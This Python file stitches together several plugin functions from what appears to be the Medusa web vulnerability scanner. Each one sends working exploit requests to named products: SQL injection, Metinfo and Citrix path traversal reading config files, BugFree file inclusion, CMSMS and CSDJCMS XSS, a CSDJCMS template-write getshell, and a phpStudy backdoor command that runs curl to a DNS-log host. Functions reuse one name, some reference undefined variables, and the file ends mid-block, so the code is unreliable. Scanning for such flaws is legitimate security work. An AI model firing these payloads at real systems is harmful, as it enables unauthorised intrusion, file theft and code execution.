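def medusa(Url, RandomAgent, UnixTimestamp):
    """Check a fixed list of ASP pages for an error-based SQL injection marker.

    Each candidate path is requested with the same encoded suffix appended.
    A finding is recorded when the marker built by that suffix appears in the
    response body.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    urls = [
        "/Rat/ebid/viewInvite3.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite4.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite5.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite6.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite2.asp?InviteId=0000002852",
        "/Rat/ebid/viewInvite1.asp?InviteId=0000002852",
        "/Rat/EBid/ViewClarify1.asp?InviteId=11",
        "/Rat/EBid/ViewClarify.asp?InviteId=11",
        "/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11",
    ]
    data = "%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--"
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload in urls:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload + data
            s = requests.session()
            # verify=False: TLS certificate validation is disabled for the probe.
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            # The body is lower-cased before the search, so the marker has to
            # be lower-case as well. The mixed-case literal "testXQ17" used
            # before could never match and the check reported nothing.
            if "testxq17" in con.lower():
                Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(url, con, payload_url)
                _t = VulnerabilityInfo(Medusa)
                # Pass the url and the scan result to the details writer.
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
                # Write to file: url is the target file name, Medusa the result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            # Log the URL together with the name of the failing plugin.
            ClassCongregation.ErrorLog().Write(url, _)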
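def medusa(Url, RandomAgent, UnixTimestamp):
    """Check /include/thumb.php for an arbitrary file read of config_db.php.

    Three variants of the ``dir`` parameter are requested. A finding is
    recorded when the response is a 200 whose body contains the database
    configuration keys and a PHP opening tag.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payloads = [
        '..././http/..././config/config_db.php',
        '.....///http/.....///config/config_db.php',
        # Raw string: "\." and "\c" are invalid escape sequences, which newer
        # Python versions warn about. The value itself is unchanged.
        r'http\..\..\config\config_db.php',
    ]
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    markers = ('con_db_host', '<?php', 'con_db_por', 'con_db_id')
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(
                port) + '/include/thumb.php?dir=' + payload
            s = requests.session()
            # verify=False: TLS certificate validation is disabled for the probe.
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and all(marker in con for marker in markers):
                # NOTE(review): the report embeds the full response body, which
                # here is the target's database configuration; treat the result
                # file as sensitive.
                Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                # Pass the url and the scan result to the details writer.
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()
                # Write to file: url is the target file name, Medusa the result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            # Log the URL together with the name of the failing plugin.
            ClassCongregation.ErrorLog().Write(url, _)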
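def medusa(Url, RandomAgent, UnixTimestamp):
    """POST a profile update to /user/do.php and inspect the response body.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing().result.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/user/do.php?ac=edit@op=zl"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        referer = scheme + "://" + url
        # NOTE(review): the Cookie header carries hard-coded administrator and
        # session values, and Content-Length is a fixed literal rather than
        # the length of `data`.
        headers = {
            "User-Agent": RandomAgent,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>"
        s = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        # The second test used to be a bare `con.find('System')`, which is
        # truthy when the text is absent (-1) and falsy when it sits at
        # index 0. Both markers are now real containment checks.
        # NOTE(review): these markers are phpinfo() headings, not the submitted
        # markup, so a match does not show that the posted field is stored or
        # rendered - confirm the intended indicator.
        if 'PHP Version' in con and 'System' in con:
            Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, _)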
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Request two /vpn/../vpns/ paths and look for a configuration marker.

    A finding is recorded for every path that answers 200 with a body that
    contains "encrypt password".

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # The whole loop sits in one try block: an error on the first path
        # also skips the second one.
        for candidate in ("/vpn/../vpns/services.html",
                          "/vpn/../vpns/cfg/smb.conf"):
            payload_url = "".join([scheme, '://', url, ':', str(port), candidate])
            request_headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
            }
            session = requests.session()
            # verify=False: TLS certificate validation is disabled for the probe.
            response = session.get(payload_url,
                                   headers=request_headers,
                                   timeout=6,
                                   proxies=proxies,
                                   verify=False)
            body = response.text
            if response.status_code == 200 and "encrypt password" in body:
                Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(
                    url, payload_url, body)
                finding = VulnerabilityInfo(Medusa)
                # Pass the url and the scan result to the details writer.
                ClassCongregation.VulnerabilityDetails(
                    finding.info, url, **kwargs).Write()
                # Write to file: url is the target file name, Medusa the result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
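def Main(Url, FileName, Values, ProxyIp):
    """Run every WordPress plugin check against Url and write each result.

    Args:
        Url: Target URL handed to each plugin.
        FileName: Name passed to ClassCongregation.WriteFile.
        Values: User-supplied browser header choice for UserAgentS.
        ProxyIp: Proxy argument handed to each plugin.

    Returns:
        None.
    """
    # The WriteFile instance must be created with the file name first.
    WriteFile = ClassCongregation.WriteFile(FileName)
    # Build the User-Agent from the header the user selected.
    ua = ClassCongregation.UserAgentS(Values)
    RandomAgent = ua.UserAgent()
    plugin_names = (
        "Wordpress_admin_ajax_filedownload",
        "Wordpress_display_widgets_backdoor",
        "Wordpress_plugin_azonpop_sqli",
        "Wordpress_plugin_mailpress_rce",
        "Wordpress_plugin_ShortCode_lfi",
        "Wordpress_woocommerce_code_exec",
    )
    for plugin_name in plugin_names:
        try:
            # Resolved inside the try so a missing plugin module is skipped
            # the same way a failing one is.
            plugin = getattr(Cms.Wordpress, plugin_name)
            Medusa = plugin.medusa(Url, RandomAgent, ProxyIp)
            WriteFile.Write(Medusa)
        except Exception:
            # Best effort: one failing plugin must not stop the others.
            # `Exception` rather than a bare except, so Ctrl-C and SystemExit
            # still end the scan.
            pass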
def medusa(Url, RandomAgent, UnixTimestamp):
    """POST an xajax language selection to /bugfree/Login.php and check the body.

    A finding is recorded when the response contains both "System" and
    "Build Date".

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join([scheme, "://", url, ":", str(port), "/bugfree/Login.php"])
        form = {
            'xajax': 'xSelectLanguage',
            'xajaxargs[]': '../../5555.txt%00',
            'xajaxr': '1377604187765'
        }
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        response = session.post(payload_url,
                                headers=request_headers,
                                data=form,
                                timeout=6,
                                verify=False)
        body = response.text
        # The status code is not part of the decision, only the two markers.
        if "System" in body and "Build Date" in body:
            Medusa = "{}存在BugFree文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """POST a random token to the CMSMS installer and check it is echoed back.

    A finding is recorded when the response is a 200 whose body contains the
    random token generated for this call.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing().result.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        token = ClassCongregation.randoms().result(20)
        path = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        body_data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(
            token)
        payload_url = "".join([scheme, "://", url, ":", str(port), path])
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: TLS certificate validation is disabled for the probe.
        response = requests.post(payload_url,
                                 data=body_data,
                                 headers=request_headers,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
        page = response.text
        # NOTE(review): only the token is searched for, so an HTML-escaped
        # echo of the input would match as well.
        if response.status_code == 200 and token in page:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, page)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Submit the module's login form data and check for the phpMyAdmin frameset.

    The request path (`payload`) and the form body (`post_data`) are names
    defined outside this function. One session sends the POST and then a GET
    to the same URL; a finding is recorded when the GET body mentions
    "navigation.php" and the POST body mentions "frame_navigation"
    (both compared case-insensitively).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join([scheme, "://", url, ':', str(port), payload])
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            "Content-Type": "application/x-www-form-urlencoded",
            'User-Agent': RandomAgent,
        }
        session = requests.session()
        # The same session is reused so cookies set by the POST reach the GET.
        # verify=False: TLS certificate validation is disabled for the probe.
        login_response = session.post(payload_url,
                                      data=post_data,
                                      headers=request_headers,
                                      proxies=proxies,
                                      timeout=5,
                                      verify=False)
        follow_up = session.get(payload_url,
                                headers=request_headers,
                                timeout=5,
                                proxies=proxies,
                                verify=False)
        login_body = login_response.text
        follow_up_body = follow_up.text
        if ('navigation.php' in follow_up_body.lower()
                and 'frame_navigation' in login_body.lower()):
            Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                url, payload_url, post_data)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the target and the plugin name to the error log writer.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """POST installer form data to CMSMS and look for the docroot value unescaped.

    A finding is recorded when the response is a 200 whose body contains the
    decoded ``docroot`` markup inside an ``<a href=`` attribute.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing().result.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        path = "/k/cms/cmsmadesimple/install/index.php"
        form_body = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        payload_url = "".join([scheme, "://", url, ":", str(port), path])
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False: TLS certificate validation is disabled for the probe.
        response = requests.post(payload_url,
                                 data=form_body,
                                 headers=request_headers,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
        page = response.text
        # The marker is the decoded form of the docroot value, so it only
        # matches when the page returns that value without HTML escaping.
        reflected = '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        if response.status_code == 200 and reflected in page:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, page)
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the plugin name, target and exception to the error log writer.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
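def medusa(Url, RandomAgent, ProxyIp):
    """POST a search request to /search.php and look for phpinfo() output.

    A finding is recorded, at High severity, when the response is a 200 whose
    body contains five phpinfo() headings.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        ProxyIp: Accepted for interface compatibility; not used by the request.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/search.php?phpinfo()"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme + '://' + url,
            'Referer': payload
        }
        s = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        resp = s.post(payload_url,
                      headers=headers,
                      data=payload_data,
                      timeout=5,
                      verify=False)
        con = resp.text
        code = resp.status_code
        markers = ('System', 'Compiler', 'Build Date', 'IPv6 Support',
                   'Configure Command')
        if code == 200 and all(marker in con for marker in markers):
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            # Severity levels: serious, High, Intermediate, Low.
            web.High()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        # `Exception` rather than a bare except, so KeyboardInterrupt and
        # SystemExit are no longer swallowed and logged as plugin errors.
        _ = VulnerabilityInfo('').info.get('algroup')
        # Hand the target and the plugin name to the error log writer.
        ClassCongregation.ErrorLog().Write(url, _)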
def medusa(Url, RandomAgent, Token, proxies=None):
    """Send a base64-encoded command in a request header and wait for a DNS log hit.

    The command references a host obtained from ClassCongregation.Dnslog; a
    finding is recorded when `DL.result()` is truthy after the request.
    The request path (`payload`) is a name defined outside this function.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to VulnerabilityDetails with the finding.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    DL = ClassCongregation.Dnslog()
    command_text = '''system("curl http://{}");'''.format(DL.dns_host())
    encoded_command = base64.b64encode(command_text.encode('utf-8'))
    try:
        payload_url = "".join([scheme, "://", url, ':', str(port), payload])
        # Key order is kept as is: the dict is printed into the report below.
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': encoded_command,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        session = requests.session()
        # The response itself is not inspected; only the DNS log decides.
        # verify=False: TLS certificate validation is disabled for the probe.
        session.get(payload_url,
                    headers=headers,
                    timeout=5,
                    proxies=proxies,
                    verify=False)
        if DL.result():
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
                url, payload_url, headers, DL.dns_host())
            finding = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Hand the target and the plugin name to the error log writer.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
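def medusa(Url, RandomAgent, Token, proxies=None):
    """Request the module's Struts2 test path and inspect the redirect target.

    The request path (`payload`) is a name defined outside this function.
    A finding is recorded when the response is a 302 whose Location header
    contains "54289".

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to VulnerabilityDetails with the finding.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload_url = scheme + "://" + url + ':' + str(port) + payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }
    try:
        s = requests.session()
        # Redirects are not followed: the Location header is what gets checked.
        resp = s.get(payload_url,
                     headers=headers,
                     proxies=proxies,
                     timeout=5,
                     allow_redirects=False)
        # A response without a Location header is the normal case for a
        # target that does not redirect. Indexing the header raised KeyError
        # there and logged a plugin error for every such target.
        con = resp.headers.get('Location', '')
        code = resp.status_code
        if code == 302 and '54289' in con.lower():
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Hand the target and the plugin name to the error log writer.
        ClassCongregation.ErrorLog().Write(url, _)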
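def medusa(Url, RandomAgent, UnixTimestamp):
    """POST a template-edit form to the target root and look for phpinfo() output.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing().result.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to VulnerabilityDetails with the finding.

    Returns:
        None. Findings and errors are handed to the ClassCongregation writers.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # NOTE(review): no path is appended here, so the form is posted to
        # the site root - confirm the intended endpoint.
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        # NOTE(review): the Cookie header carries hard-coded administrator and
        # session values, and Content-Length is a fixed literal rather than
        # the length of `data`.
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        # NOTE(review): this form asks the target to modify a template file,
        # so unlike a read-only probe the check can change the scanned system.
        data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5"
        s = requests.session()
        # verify=False: TLS certificate validation is disabled for the probe.
        resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        # The second test used to be a bare `con.find('System')`, which is
        # truthy when the text is absent (-1) and falsy when it sits at
        # index 0. Both markers are now real containment checks.
        if 'PHP Version' in con and 'System' in con:
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Pass the url and the scan result to the details writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
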